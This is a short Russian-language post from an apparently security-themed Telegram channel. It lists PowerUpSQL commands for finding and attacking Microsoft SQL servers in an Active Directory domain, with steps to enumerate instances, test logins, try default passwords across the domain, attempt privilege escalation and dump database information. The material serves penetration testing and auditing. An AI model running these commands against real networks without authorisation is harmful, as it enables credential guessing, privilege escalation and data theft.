🔖 S.E.Заметка. Базы данных в среде Active Directory.
🖖🏻 Приветствую тебя user_name.
• В среде Active Directory, как правило, несколько серверов баз данных. PowerUpSQL — полезный инструмент для обнаружения и перечисления серверов Microsoft SQL и атак на них.
• Найти все локальные экземпляры SQL можно командой:
Get-SQLInstanceLocal -Verbose
• Чтобы найти все экземпляры SQL в сети или домене, используй команды:
Get-SQLInstanceDomain -Verbose
Get-SQLInstanceBroadcast -Verbose
Get-SQLInstanceScanUDP -Verbose
• После поиска собираем информацию об экземплярах SQL.
Локальных:
Get-SQLInstanceLocal | Get-SQLServerInfo
И удаленных:
Get-SQLServerInfo -Instance "Имя ПК"
• Когда мы нашли все экземпляры SQL и собрали информацию о них, мы можем:
Получить список экземпляров SQL, в которые разрешен вход текущему пользователю домена:
Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose -Threads 10
Попытаться получить права администратора для экземпляра SQL:
Invoke-SQLEscalatePriv -Verbose -Instance "Имя ПК"
Перечислить экземпляры SQL по всему домену с использованием паролей по умолчанию:
Get-SQLInstanceDomain -Verbose | Get-SQLServerLoginDefaultPw -Verbose
Сдампить информацию о SQL Server и базе данных в файлы CSV или XML:
Invoke-SQLDumpInfo -Verbose -Instance "Имя ПК"
Запустить функции аудита для сервера SQL:
Invoke-SQLAudit -Verbose -Instance "Имя ПК"
#AD, #Заметка. Твой itle="Social Engineering" href="/channels/@Social_engineering">S.E.
